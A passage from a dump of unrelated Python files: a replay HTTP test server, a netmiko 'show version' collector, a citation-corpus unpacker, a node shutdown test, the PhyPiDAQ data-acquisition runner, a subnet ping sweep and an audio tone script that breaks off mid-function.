if request_hash not in G_replay_dict:
self.send_response(404)
self.send_header('Connection', 'close')
self.end_headers()
else:
resp = G_replay_dict[request_hash]
headers = resp.getHeaders().split('\r\n')
# set status codes
status_code = self.get_response_code(headers[0])
self.send_response(status_code)
# set headers
for header in headers[1:]: # skip first one b/c it's response code
if header == '':
continue
elif 'Content-Length' in header:
self.send_header('Content-Length', '0')
continue
header_parts = header.split(':', 1)
header_field = str(header_parts[0].strip())
header_field_val = str(header_parts[1].strip())
#print("{0} === >{1}".format(header_field, header_field_val))
self.send_header(header_field, header_field_val)
self.end_headers()
def do_POST(self):
response_string = None
chunkedResponse = False
global G_replay_dict, test_mode_enabled
if test_mode_enabled:
request_hash = self.getLookupKey(self.requestline)
else:
request_hash, __ = cgi.parse_header(self.headers.get('Content-MD5'))
try:
if request_hash not in G_replay_dict:
self.send_response(404)
self.send_header('Connection', 'close')
self.end_headers()
resp = None
else:
resp = G_replay_dict[request_hash]
resp_headers = resp.getHeaders().split('\r\n')
# set status codes
status_code = self.get_response_code(resp_headers[0])
#print("response code",status_code)
self.send_response(status_code)
#print("reposen is ",resp_headers)
# set headers
for header in resp_headers[1:]: # skip first one b/c it's response code
if header == '':
continue
elif 'Content-Length' in header:
if 'Access-Control' in header: # skipping Access-Control-Allow-Credentials, Access-Control-Allow-Origin, Content-Length
header_parts = header.split(':', 1)
header_field = str(header_parts[0].strip())
header_field_val = str(header_parts[1].strip())
self.send_header(header_field, header_field_val)
continue
lengthSTR = header.split(':')[1]
length = lengthSTR.strip(' ')
if test_mode_enabled: # the length of the body is given priority in test mode rather than the value in Content-Length. But in replay mode Content-Length gets the priority
if not (resp and resp.getBody()): # Don't attach content-length yet if body is present in the response specified by tester
self.send_header('Content-Length', str(length))
else:
self.send_header('Content-Length', str(length))
response_string = self.createDummyBodywithLength(int(length))
continue
if 'Transfer-Encoding' in header:
self.send_header('Transfer-Encoding', 'Chunked')
response_string = '%X\r\n%s\r\n' % (len('microserver'), 'microserver')
chunkedResponse = True
continue
header_parts = header.split(':', 1)
header_field = str(header_parts[0].strip())
header_field_val = str(header_parts[1].strip())
#print("{0} === >{1}".format(header_field, header_field_val))
self.send_header(header_field, header_field_val)
# End for loop
if test_mode_enabled:
if resp and resp.getBody():
length = len(bytes(resp.getBody(), 'UTF-8'))
response_string = resp.getBody()
self.send_header('Content-Length', str(length))
self.end_headers()
if (chunkedResponse):
self.writeChunkedData()
elif response_string != None and response_string != '':
self.wfile.write(bytes(response_string, 'UTF-8'))
return
except:
e = sys.exc_info()
print("Error", e, self.headers)
self.send_response(400)
self.send_header('Connection', 'close')
self.end_headers()
def populate_global_replay_dictionary(sessions):
''' Populates the global dictionary of {uuid (string): reponse (Response object)} '''
global G_replay_dict
for session in sessions:
for txn in session.getTransactionIter():
G_replay_dict[txn._uuid] = txn.getResponse()
print("size", len(G_replay_dict))
# tests will add responses to the dictionary where key is the testname
def addResponseHeader(key, response_header):
G_replay_dict[key] = response_header
def _path(exists, arg):
path = os.path.abspath(arg)
if not os.path.exists(path) and exists:
msg = '"{0}" is not a valid path'.format(path)
raise argparse.ArgumentTypeError(msg)
return path
def _bool(arg):
opt_true_values = set(['y', 'yes', 'true', 't', '1', 'on', 'all'])
opt_false_values = set(['n', 'no', 'false', 'f', '0', 'off', 'none'])
tmp = arg.lower()
if tmp in opt_true_values:
return True
elif tmp in opt_false_values:
return False
else:
msg = 'Invalid value Boolean value : "{0}"\n Valid options are {0}'.format(arg,
opt_true_values | opt_false_values)
raise argparse.ArgumentTypeError(msg)
def main():
global test_mode_enabled
parser = argparse.ArgumentParser()
parser.add_argument("--data-dir", "-d",
type=lambda x: _path(True, x),
required=True,
help="Directory with data file"
)
parser.add_argument("--ip_address", "-ip",
type=str,
default='',
help="IP address of the interface to serve on"
)
parser.add_argument("--port", "-p",
type=int,
default=SERVER_PORT,
help="Port to use")
parser.add_argument("--delay", "-dy",
type=float,
default=SERVER_DELAY,
help="Response delay")
parser.add_argument("--timeout", "-t",
type=float,
default=None,
help="socket time out in seconds")
parser.add_argument('-V', '--version', action='version', version='%(prog)s {0}'.format(__version__))
parser.add_argument("--mode", "-m",
type=str,
default="test",
help="Mode of operation")
parser.add_argument("--ssl", "-ssl",
type=str,
default="False",
help="SSL port")
parser.add_argument("--key", "-k",
type=str,
default="ssl/server.pem",
help="key for ssl connnection")
parser.add_argument("--cert", "-cert",
type=str,
default="ssl/server.crt",
help="certificate")
parser.add_argument("--clientverify", "-cverify",
type=bool,
default=False,
help="verify client cert")
parser.add_argument("--load",
dest='load',
type=str,
default='',
help="A file which will install observers on hooks")
parser.add_argument("--lookupkey",
type=str,
default="{PATH}",
help="format string used as a key for response lookup: \
example: \"{%%Host}{%%Server}{PATH}\", \"{HOST}{PATH}\", \"{PATH}\"\
All the args preceded by %% are header fields in the request\
The only two acceptable arguments which are not header fields are : fqdn (represented by HOST) and the url path (represented by PATH) in a request line.\
Example: given a client request as << GET /some/resource/location HTTP/1.1\nHost: hahaha.com\n\n >>, if the user wishes the host field and the path to be used for the response lookup\
then the required format will be {%%Host}{PATH}")
args = parser.parse_args()
options = args
global time_delay
time_delay = options.delay
# set up global dictionary of {uuid (string): response (Response object)}
s = sv.SessionValidator(args.data_dir)
populate_global_replay_dictionary(s.getSessionIter())
print("Dropped {0} sessions for being malformed".format(len(s.getBadSessionList())))
# start server
try:
socket_timeout = args.timeout
test_mode_enabled = args.mode == "test"
global lookup_key_
lookup_key_ = args.lookupkey
MyHandler.protocol_version = HTTP_VERSION
if options.ssl == "True" or options.ssl == "true":
server = SSLServer((options.ip_address, options.port), MyHandler, options)
else:
server = ThreadingServer((options.ip_address, options.port), MyHandler, options)
server.timeout = 5
print("started server on port {0}".format(options.port))
server_thread = threading.Thread(target=server.serve_forever())
server_thread.daemon = True
server_thread.start()
except KeyboardInterrupt:
print("\n=== ^C received, shutting down httpserver ===")
server.socket.close()
# s_server.socket.close()
sys.exit(0)
if __name__ == '__main__':
main()
|
net_shver_proc_queue.py
|
#!/usr/bin/env python
from net_system.models import NetworkDevice, Credentials
import django
from netmiko import ConnectHandler
from datetime import datetime
from multiprocessing import Process, current_process, Queue
def show_version_queue(a_device, q):
output_dict = {}
creds = a_device.credentials
remote_conn = ConnectHandler(device_type=a_device.device_type, ip=a_device.ip_address, username=creds.username, password=creds.password, port=a_device.port, secret="")
output = ("#" * 30) + str(a_device.device_name) + ("#" * 30) + "\n"
output += remote_conn.send_command("show version") + "\n"
output += ("#" * 80) + "\n"
output_dict[a_device.device_name] = output
q.put(output_dict)
def main():
django.setup()
start_time = datetime.now()
q = Queue(maxsize=20)
devices = NetworkDevice.objects.all()
procs = []
for a_device in devices:
my_proc = Process(target=show_version_queue, args=(a_device,q))
my_proc.start()
procs.append(my_proc)
for a_proc in procs:
# print a_proc
a_proc.join()
while not q.empty():
my_dict = q.get()
for k,v in my_dict.iteritems():
#print k
print v
print "\nElapsed time: " + str(datetime.now() - start_time)
if __name__ == "__main__":
main()
|
unpack.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (c) 2017, Silvio Peroni <essepuntato@gmail.com>
#
# Permission to use, copy, modify, and/or distribute this software for any purpose
# with or without fee is hereby granted, provided that the above copyright notice
# and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT, INDIRECT,
# OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE,
# DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS
# SOFTWARE.
# This script unpacks all the DAR files related to a monthly OpenCitations Corpus dump
# and recreates the Corpus file system
import argparse
import zipfile
import re
import os
import subprocess
import glob
from multiprocessing import Process, Pool
from time import sleep
def unpack(zip_file, out_d=None):
if out_d is None:
out_dir = os.path.dirname(zip_file)
else:
out_dir = out_d
zip_file_basename = os.path.basename(zip_file)
print("[File '%s'] Start processing" % zip_file_basename)
current_dir = re.sub("[0-9-]+corpus_([^_\.]+).*", "\\1", zip_file_basename)
dir_path = out_dir + os.sep + current_dir
if not os.path.exists(dir_path):
os.makedirs(dir_path)
print("[File '%s'] Directory '%s' created" % (zip_file_basename, dir_path))
f_null = open(os.devnull, 'w')
zip_ref = zipfile.ZipFile(zip_file, 'r')
zip_ref.extractall(dir_path)
zip_ref.close()
print("[File '%s'] File unzipped correctly" % zip_file_basename)
dar_name = zip_file_basename[:-4]
if subprocess.call(["dar", "-O", "-R", dir_path + os.sep, "-x", dir_path + os.sep + dar_name],
stdout=f_null, stderr=subprocess.STDOUT):
print("[File '%s'] DAR was not extracted due to issues" % zip_file_basename)
else:
print("[File '%s'] DAR was extracted correctly" % zip_file_basename)
for dar_file in glob.glob(dir_path + os.sep + dar_name + ".[0-9]*.dar"):
os.remove(dar_file)
print("[File '%s'] DAR files deleted" % zip_file_basename)
os.remove(zip_file)
print("[File '%s'] Original zip file deleted" % zip_file_basename)
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser("unpack.py",
description="This script unpack all the DAR files related to a monthly "
"OpenCitations Corpus dump (stored in ZIP files) and "
"recreates the Corpus file system")
arg_parser.add_argument("-i", "--input", dest="input", required=True,
help="The directory containing all the ZIP files to unpack.")
arg_parser.add_argument("-o", "--output", dest="output",
help="The directory where to store the Corpus data. If no "
"directory is specified, the script use the one specified "
"as input.")
args = arg_parser.parse_args()
in_dir = args.input
out_dir = in_dir
if args.output is not None:
out_dir = args.output
# job_server = pp.Server()
#
# jobs = []
#
# for cur_file in [zip_file for zip_file in os.listdir(in_dir) if zip_file.endswith(".zip")]:
# jobs += [job_server.submit(unpack, (in_dir + os.sep + cur_file, out_dir), modules=('re', 'os', 'zipfile', 'subprocess', 'glob'))]
#
# for job in jobs:
# job()
# procs = []
#
# for idx, cur_file in enumerate([zip_file for zip_file in os.listdir(in_dir) if zip_file.endswith(".zip")]):
# p = Process(target=unpack, args=(in_dir + os.sep + cur_file, out_dir))
# procs.append(p)
#
# for p in procs:
# p.start()
# sleep(5)
#
# for p in procs:
# p.join()
inputs = ()
for idx, cur_file in enumerate([zip_file for zip_file in os.listdir(in_dir) if zip_file.endswith(".zip")]):
inputs += (in_dir + os.sep + cur_file,)
print inputs
p = Pool(len(inputs))
p.map_async(unpack, inputs)
p.close()
p.join()
print("DONE")
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test flocoind shutdown."""
from test_framework.test_framework import FlocoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(FlocoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
self.supports_cli = False
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
self.wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
runPhyPiDAQ.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""run data acquisition
class collects data samples from various sensors, (re-)formats
and sends them to a display module, a file, a pipe or a websocket
Usage: ./runPhyPiDAQ.py [<PhyPiConf_file>.daq] [Interval]
"""
from __future__ import print_function, division, unicode_literals
from __future__ import absolute_import
# Package imports
import sys
import os
import time
import yaml
import numpy as np
import threading
import multiprocessing as mp
# math module needed for formulae
from math import *
# Display module
# only imported if needed: phypidaq.DisplayManager import DisplayManager
# Webserver
# module .WebsocketManager only imported if needed
# data recorder
from .DataRecorder import DataRecorder
# other helper functions
from .helpers import DAQwait
# modules imported only if needed
# from .helpers import generateCalibrationFunction
# from .helpers import RingBuffer
# ----- class for running data acquisition --------------------
class runPhyPiDAQ(object):
def __init__(self, verbose=1):
self.verbose = verbose
def prompt(self):
"""print status and prompt for command"""
class tc:
"""define terminal color codes"""
r = '\033[1;31;48m'
g = '\033[1;32;48m' # green color
b = '\033[1;34;48m'
k = '\033[1;30;48m'
y = '\033[1;33;48m' # yellow color
p = '\033[1;35;48m'
c = '\033[1;36;48m'
B = '\033[1;37;48m' # bold
U = '\033[4;37;48m' # underline
E = '\033[1;37;0m' # end color
# prompt for user input
prompt = ' type -> P(ause), R(esume), E(nd) or s(ave) + <ret> '
status = tc.b+tc.g+'Running'+tc.E if self.DAQ_ACTIVE else tc.b+tc.y+'Paused '+tc.E
print('\r' + 5*' ' + status + 5*' ' + tc.prompt, end='')
def keyboard_input(self, cmd_queue):
""" Read keyboard input, run as background-thread to avoid blocking """
first = True
while self.ACTIVE:
if first:
self.prompt()
first = False
cmd_queue.put(input())
def decodeCommand(self, cmdQ):
"""
evaluate keyboard commands
returns: 0 invalid command
1 status change
2 exit
"""
cmd = cmdQ.get()
rc = 0
if cmd == 'E':
if self.verbose > 1:
print('\n' + sys.argv[0] + ': End command received')
print('')
self.ACTIVE = False
rc = 2
elif cmd == 'P':
self.DAQ_ACTIVE = False
rc = 1
elif cmd == 'R':
self.DAQ_ACTIVE = True
rc = 1
elif cmd == 's':
self.DAQ_ACTIVE = False
if self.RBuf is not None:
print('\n storing data to file ', self.bufferFile, ' - now paused')
print(42 * ' ' + ' -> R(esume), E(nd) + <ret> ', end='', flush=True)
self.storeBufferData(self.bufferFile)
else:
print('\n buffer storage not active - no action')
rc = 1
self.prompt() # update status
return rc
def storeBufferData(self, fnam):
bufRec = DataRecorder(fnam, self.PhyPiConfDict)
for d in self.RBuf.read():
bufRec(d)
bufRec.close()
def setup(self):
"""
Set up data source(s), display module and options
interval: sampling interval
PhyPiConfDict: dictionary with config options
DEVs: list of instances of device classes
ChanIdx_ofDevice: index to store 1st channel of device i
NHWChannels number of active hardware channels
CalibFuncts: functions for calibration of raw channel readings
Formulae: list of formulae to apply to hardware channels
NFormulae: number of formulae
DatRec: instance of DataRecorder
"""
# check for / read command line arguments
if len(sys.argv) >= 3:
self.interval = float(sys.argv[2])
else:
self.interval = 0.5
# read PhyPiDAQ configuration file
if len(sys.argv) >= 2:
PhyPiConfFile = sys.argv[1]
else:
PhyPiConfFile = 'PhyPiConf.daq'
# read DAQ configuration file
if self.verbose:
print(' Configuration from file ' + PhyPiConfFile)
try:
with open(PhyPiConfFile) as f:
PhyPiConfDict = yaml.load(f, Loader=yaml.Loader)
except (OSError, yaml.YAMLError) as exception:
print('!!! failed to read configuration file ' + PhyPiConfFile)
print(str(exception))
exit(1)
# set default options:
if 'Interval' not in PhyPiConfDict:
PhyPiConfDict['Interval'] = self.interval
else:
self.interval = PhyPiConfDict['Interval']
if PhyPiConfDict['Interval'] < 0.05:
print(" !!! read-out intervals < 0.05 s not reliable, setting to 0.05 s")
PhyPiConfDict['Interval'] = 0.05
if 'NHistoryPoints' not in PhyPiConfDict: # length of stored history
PhyPiConfDict['NHistoryPoints'] = 120
if 'XYmode' not in PhyPiConfDict: # default is XY mode off
PhyPiConfDict['XYmode'] = False
if 'DataFile' not in PhyPiConfDict: # default is not to write output file
PhyPiConfDict['DataFile'] = None
if 'DisplayModule' not in PhyPiConfDict: # default display is DataLogger
PhyPiConfDict['DisplayModule'] = 'DataLogger'
if 'startActive' not in PhyPiConfDict: # default is to start in Paused mode
PhyPiConfDict['startActive'] = False
# read Device configuration(s) and instantiate device handler(s)
if 'DeviceFile' in PhyPiConfDict:
DevFiles = PhyPiConfDict['DeviceFile']
else:
DevFiles = 'ADS1115Config.yaml'
print("!!! no device config given - trying ADC ADS1115")
# if not a list, make it one
if not isinstance(DevFiles, list):
DevFiles = [DevFiles]
NDevices = len(DevFiles)
# open all device config files
DEVconfDicts = []
for fnam in DevFiles:
try:
f = open(fnam)
DEVconfDicts.append(yaml.load(f, Loader=yaml.Loader))
f.close()
except (OSError, yaml.YAMLError) as exception:
print('!!! failed to read configuration file ' + fnam)
print(str(exception))
exit(1)
# configure and initialize all Devices
DEVNames = [] # device names
NHWChannels = 0 # total number of hardware channels
ChanNams = [] # names of HW channels
ChanUnits = [] # Units of HW channels
ChanLims = [] # limits
ChanIdx_ofDevice = [] # first channel of each device
DEVs = []
for i in range(NDevices):
if 'DAQModule' in DEVconfDicts[i]:
DEVNames.append(DEVconfDicts[i]['DAQModule'])
else: # try to derive from name of Device Config File
cdir, cfnam = os.path.split(DeviceFiles[i])
DEVNames.append(cfnam.split('.')[0])
if self.verbose:
print(' configuring device ' + DEVNames[i])
# import device class ...
exec('from .' + DEVNames[i] + ' import ' + DEVNames[i])
# ... and instantiate device handler
# exec('global DEVs; DEVs.append(' + DEVNames[i] + '(DEVconfDicts[i]) )' )
exec('DEVs.append(' + DEVNames[i] + '(DEVconfDicts[i]) )')
DEVs[i].init()
ChanIdx_ofDevice.append(NHWChannels)
nC = DEVs[i].NChannels
NHWChannels += nC
ChanNams += DEVs[i].ChanNams[0: nC]
ChanLims += DEVs[i].ChanLims[0: nC]
try:
ChanUnits += DEVs[i].ChanUnits[0: nC]
except (TypeError, AttributeError):
ChanUnits = None
self.DEVs = DEVs
self.ChanIdx_ofDevice = ChanIdx_ofDevice
self.ChanLims = ChanLims
self.ChanNams = ChanNams
self.ChanUnits = ChanUnits
self.NHWChannels = NHWChannels
# set up calibration Functions
CalibFuncts = None
if 'ChanCalib' in PhyPiConfDict:
from .helpers import generateCalibrationFunction
CalibFuncts = [None] * NHWChannels
calibData = PhyPiConfDict['ChanCalib']
if self.verbose > 1:
print(' Calibrating channels:')
for ic in range(NHWChannels):
print(' Chan ', ic, ' ', calibData[ic])
for ic in range(NHWChannels):
if calibData[ic] is not None:
CalibFuncts[ic] = generateCalibrationFunction(calibData[ic])
self.CalibFuncts = CalibFuncts
# Apply Formula(e) to calibrated channel reading(s)
Formulae = None
NFormulae = 0
if 'ChanFormula' in PhyPiConfDict:
Formulae = PhyPiConfDict['ChanFormula']
NFormulae = len(Formulae)
if self.verbose > 1:
print('applying formulae:')
for ifc in range(NFormulae):
if Formulae[ifc]:
print(' FChan ', ifc, ' ', Formulae[ifc])
self.Formulae = Formulae
self.NFormulae = NFormulae
# re-set number of Channels if Formulae are defined
nc = NFormulae if NFormulae else NHWChannels
PhyPiConfDict['NChannels'] = nc
# Add information for graphical display(s) to PhyPiConfDict
if 'ChanNams' not in PhyPiConfDict:
if NFormulae > NHWChannels:
self.ChanNams += (NFormulae - NHWChannels) * ['F']
else:
self.ChanNams = self.ChanNams[:nc]
for ifc in range(NFormulae):
if Formulae[ifc]:
self.ChanNams[ifc] = 'F' + str(ifc)
PhyPiConfDict['ChanNams'] = self.ChanNams
if 'ChanUnits' not in PhyPiConfDict:
if self.ChanUnits is not None:
PhyPiConfDict['ChanUnits'] = self.ChanUnits
else:
PhyPiConfDict['ChanUnits'] = [''] * nc
length = len(PhyPiConfDict['ChanUnits'])
if length < nc:
PhyPiConfDict['ChanUnits'] += (nc - length) * ['']
if 'ChanLabels' not in PhyPiConfDict:
PhyPiConfDict['ChanLabels'] = [''] * nc
else:
length = len(PhyPiConfDict['ChanLabels'])
if length < nc:
PhyPiConfDict['ChanLabels'] += (nc - length) * ['']
if 'ChanLimits' not in PhyPiConfDict:
if NFormulae > 0:
print('PhyPiDAQ: forumla(e) defined, but no ChanLimits supplied ')
print(' results may become unpredictable - exiting')
exit(1)
PhyPiConfDict['ChanLimits'] = ChanLims # take from hw devices if not set
# start data recording to disk if required
if PhyPiConfDict['DataFile'] is not None:
FName = PhyPiConfDict['DataFile']
self.DatRec = DataRecorder(FName, PhyPiConfDict)
if self.verbose:
print(' storing data to file ', FName)
else:
self.DatRec = None
PhyPiConfDict['DataFile'] = self.DatRec
# buffer the latest data (number of data points given by NHistoryPoints)
if 'bufferData' in PhyPiConfDict:
self.bufferFile = PhyPiConfDict['bufferData']
else:
self.bufferFile = "PhyPiData"
PhyPiConfDict['bufferData'] = self.bufferFile
# set-up a ring buffer
if self.bufferFile is not None:
from .helpers import RingBuffer
self.RBuf = RingBuffer(PhyPiConfDict['NHistoryPoints'])
else:
self.RBuf = None
# Configure a fifo for data output
if 'DAQfifo' in PhyPiConfDict:
self.DAQfifo = PhyPiConfDict['DAQfifo']
else:
self.DAQfifo = None
PhyPiConfDict['DAQfifo'] = self.DAQfifo
if self.DAQfifo:
print('PhyPiDAQ: opening fifo ', self.DAQfifo)
print(' start process reading from fifo')
from .helpers import FifoManager
self.send_to_fifo = FifoManager(self.DAQfifo)
# Configure a websocket for data transfer
if 'DAQwebsocket' in PhyPiConfDict:
self.DAQwebsocket = PhyPiConfDict['DAQwebsocket']
else:
self.DAQwebsocket = None
PhyPiConfDict['DAQwebsocket'] = self.DAQwebsocket
if self.DAQwebsocket:
from .WebsocketManager import WebsocketManager
print('PhyPiDAQ: opening websocket')
print(' start process reading websocket')
try:
self.send_to_websocket = WebsocketManager(interval=self.interval, config_dict=PhyPiConfDict)
except Exception as e:
print("!!! failed to set up websocket !!!")
print(e)
exit(1)
# LED indicators on GPIO pins
if 'RunLED' in PhyPiConfDict or 'ReadoutLED' in PhyPiConfDict:
from .pulseGPIO import pulseGPIO
if 'RunLED' in PhyPiConfDict:
self.RunLED = pulseGPIO(PhyPiConfDict['RunLED'])
else:
self.RunLED = None
if 'ReadoutLED' in PhyPiConfDict:
self.ReadoutLED = pulseGPIO(PhyPiConfDict['ReadoutLED'])
else:
self.ReadoutLED = None
# Print configuration
if self.verbose > 1:
print('\nPhyPiDAQ Configuration:')
print(yaml.dump(PhyPiConfDict))
self.PhyPiConfDict = PhyPiConfDict
def apply_calibs(self):
"""
apply calibration functions to hardware channels
input: Calibration Functions as calculated by
generateCalibrationFunctions() from interpolated
values in calibration table calibData[]
output: calibrated channel values
"""
for i in range(self.NHWChannels):
if self.CalibFuncts[i] is not None:
self.data[i] = self.CalibFuncts[i](self.data[i])
def apply_formulae(self):
"""
Calculate new quantities from hardware channels c0, c1, ...
replace entries in data by calculated quantities
input: - data from hardware channels
- list of formulae
data in hw channels c0, c1, ...
formula expressions are valid python expressions, where
all functions from math package can be used
output: calculated quantities by applying formula
f1(c0, c1 ...), f2(c0, c1, ...), ...
number of formulae may exceed number of hardware channels
"""
# copy data from hardware channels
# for ifc in range(self.NFormulae):
for ifc in range(self.NHWChannels):
exec('c' + str(ifc) + ' = self.data[' + str(ifc) + ']')
# apply formulae to signal data
for ifc in range(self.NFormulae):
if self.Formulae[ifc] is not None:
self.data[ifc] = eval(self.Formulae[ifc])
def run(self):
"""
Run data acquisition as defined in configuration files
:return:
"""
if self.verbose:
print('*==* script ' + sys.argv[0] + ': data taking active \n')
longInterval = 5. # definiton of a "long" readout interval
interval = self.PhyPiConfDict['Interval']
NChannels = self.PhyPiConfDict['NChannels']
DisplayModule = self.PhyPiConfDict['DisplayModule']
cmdQ = mp.Queue(1) # Queue for command input
datQ = mp.Queue(1) # Queue to spy on data transfer inside class Display
if 'startActive' not in self.PhyPiConfDict:
self.PhyPiConfDict['startActive'] = False # start in paused-mode
if 'DAQCntrl' not in self.PhyPiConfDict:
self.PhyPiConfDict['DAQCntrl'] = True # enable run control buttons
if DisplayModule is not None:
from .DisplayManager import DisplayManager
display_manager = DisplayManager(interval=None,
config_dict=self.PhyPiConfDict,
cmd_queue=cmdQ,
data_queue=datQ)
display_manager.init()
self.ACTIVE = True # background process(es) active
if self.PhyPiConfDict['startActive']:
self.DAQ_ACTIVE = True # Data Acquisition active
else:
# start in paused-mode
self.DAQ_ACTIVE = False # Data Acquisition inactive
print(' starting in Paused mode - type R to resume')
# start keyboard control
kbdthrd = threading.Thread(name='kbdInput', target=self.keyboard_input, args=(cmdQ,))
kbdthrd.daemon = True
kbdthrd.start()
# set up space for data
self.data = np.zeros(max(NChannels, self.NHWChannels))
tflash = min(0.2, interval / 2.) # pulse duration for readout LED
if self.RunLED:
self.RunLED.pulse(0) # switch on status LED
# -- LOOP
try:
cnt = 0
# T0 = time.time()
# brk = False
wait = DAQwait(interval) # initialize wait timer
while self.ACTIVE:
# regularly check for command input for long intervals
if interval > longInterval and self.DAQ_ACTIVE:
cmd = 0
while not datQ.empty(): # check for command input
if not cmdQ.empty():
cmd = self.decodeCommand(cmdQ)
if cmd:
break # got valid command
time.sleep(longInterval / 300.)
if cmd >= 2:
break # end command received
if self.DAQ_ACTIVE:
cnt += 1
# read data
for i, DEV in enumerate(self.DEVs):
DEV.acquireData(self.data[self.ChanIdx_ofDevice[i]:])
if self.ReadoutLED:
self.ReadoutLED.pulse(tflash) # pulse readout LED
# eventually calibrate raw readings
if self.CalibFuncts:
self.apply_calibs()
# eventually apply formula(e)
if self.Formulae:
self.apply_formulae()
# display data
if DisplayModule is not None:
display_manager.showData(self.data[:NChannels])
# store (latest) data in ring buffer as a list ...
if self.RBuf is not None:
self.RBuf.store(self.data[:NChannels].tolist())
# ... and record all data to disc ...
if self.DatRec:
self.DatRec(self.data[:NChannels])
if self.DAQfifo is not None or self.DAQwebsocket is not None:
# transform data to csv format
csv_data = ','.join(['{0:.3f}'.format(cnt * interval)] +
['{0:.4g}'.format(d) for d in self.data[:NChannels]])+'\n'
# ... write to fifo ...
if self.DAQfifo is not None:
self.send_to_fifo(csv_data)
# ... or send to websocket
if self.DAQwebsocket is not None:
self.send_to_websocket(csv_data)
# system time-corrected wait
wait()
else: # paused mode
time.sleep(min(interval / 10., 0.2))
# check for control input (from keyboard or display module)
if not cmdQ.empty():
self.decodeCommand(cmdQ)
# -- end while ACTIVE
except KeyboardInterrupt:
self.DAQ_ACTIVE = False
self.ACTIVE = False
print('\n' + sys.argv[0] + ': keyboard interrupt - closing down ...')
except BaseException:
# 'except Exception as e' leaves some errors unnoted
print('\n!!! ' + sys.argv[0] + ': exception in data-taking loop')
print(sys.exc_info()[1])
finally:
self.ACTIVE = False
print("\n*==* PhyPiDAQ Terminating ...")
if self.RunLED is not None:
self.RunLED.pulse(-1) # RunLED off
if self.DatRec:
self.DatRec.close()
if self.DAQfifo:
self.send_to_fifo('') # empty record to inform clients
self.send_to_fifo.close()
if self.DAQwebsocket:
self.send_to_websocket('\n') # empty record to inform clients
time.sleep(0.1)
self.send_to_websocket.close()
for DEV in self.DEVs:
DEV.closeDevice() # close down hardware device
if DisplayModule is not None:
display_manager.close()
if self.RunLED is not None:
self.RunLED.close()
if self.ReadoutLED is not None:
self.ReadoutLED.close()
time.sleep(1.)
if self.verbose:
print('\n*==* ' + sys.argv[0] + ': normal end - type <ret>')
sys.exit()
# execute only if called directly, but not when imported
if __name__ == "__main__": # - - - - - - - - - - - - - - - - - - - - - -
from .helpers import keyboard_wait
if len(sys.argv) != 2:
print("\n!!! run_phypi.py usage:\n" + 10 * ' ' + "run_phypi.py <config>.daq\n")
prompt = " starting demo mode from configuration PhyPiDemo.daq" \
+ "\n" + 25 * ' ' + "type <ret> to continue, 'E+<ret>' to exit -> "
answer = keyboard_wait(prompt)
if answer == '':
sys.argv.append("PhyPiDemo.daq")
else:
print(" exiting")
sys.exit(1)
daq = runPhyPiDAQ(verbose=1)
# 0: only errors are printed
# 1: normal output
# 2: verbose output
daq.setup()
print("DAQ set-up:\n", yaml.dump(daq.PhyPiConfDict))
daq.run()
|
mtping.py
|
import subprocess
import threading
def ping(host):
rc = subprocess.call(
'ping -c2 %s &> /dev/null' % host,
shell=True
)
if rc == 0:
print('\033[32;1m%s:up\033[0m' % host)
else:
print('\033[31;1m%s:down\033[0m' % host)
if __name__ == '__main__':
ips = ['172.40.58.%s' % i for i in range(1, 255)]
for ip in ips:
t = threading.Thread(target=ping, args=(ip,))
t.start() # target(ip) -> ping(ip)
|
two_part.py
|
import random
import pyaudio
from clear_osc import SineOsc
import multiprocessing as mp
import time
sine_osc = SineOsc()
p = pyaudio.PyAudio()
stream = p.open(format=pyaudio.paFloat32,
channels=1,
rate=44100,
output=1,
)
x = 145
freqs = [
x,
x * 9/8,
x * 4/3,
x * 5/4,
x * 3/2,
x * 11/8,
x * 3/2,
x * 15/18,
x * 5/1.5,
x * 4/6,
x * 9/4,
x * 5/4,
x * 4/1.5,
x * 6/2,
x * 15/4,
x * 6/2,
x * 4,
x * 3/2,
x * 3/2,
x * 4/3,
x * 5/4,
x * 3/2,
x * 4/3,
x * 5/4,
#
x * 9/8,
x * 3/2,
x * 3/2,
x * 4/3,
x * 11/8,
x * 10/4,
x * 10/4,
x * 9/4,
x * 7/4,
x * 3/2,
x * 3/2,
x * 5/3,
x * 11/8,
0,
x * 12/5,
x * 12/5,
x * 3/2,
x * 3/2,
x * 4/3,
x * 13/8,
x * 13/8,
x * 5/2,
x * 7/2,
x * 9/2,
x * 10/3,
]
freqs2 = [
x * 11/8,
x * 11/8,
0,
x * 12/5,
x * 12/5,
x * 3/2,
x * 3/2,
x * 4/3,
x * 13/8,
x * 13/8,
x * 5/2,
x * 7/2,
x * 9/2,
x * 10/3,
]
timesThroughBach = 2
length = 60
def func1():
print ('func1')
for i in range(timesThroughBach):
for freq in freqs:
sine_osc.play_frequencies(stream, .25, 1, 8000, 1000,
freq,
freq * 2,
freq + 2,
)
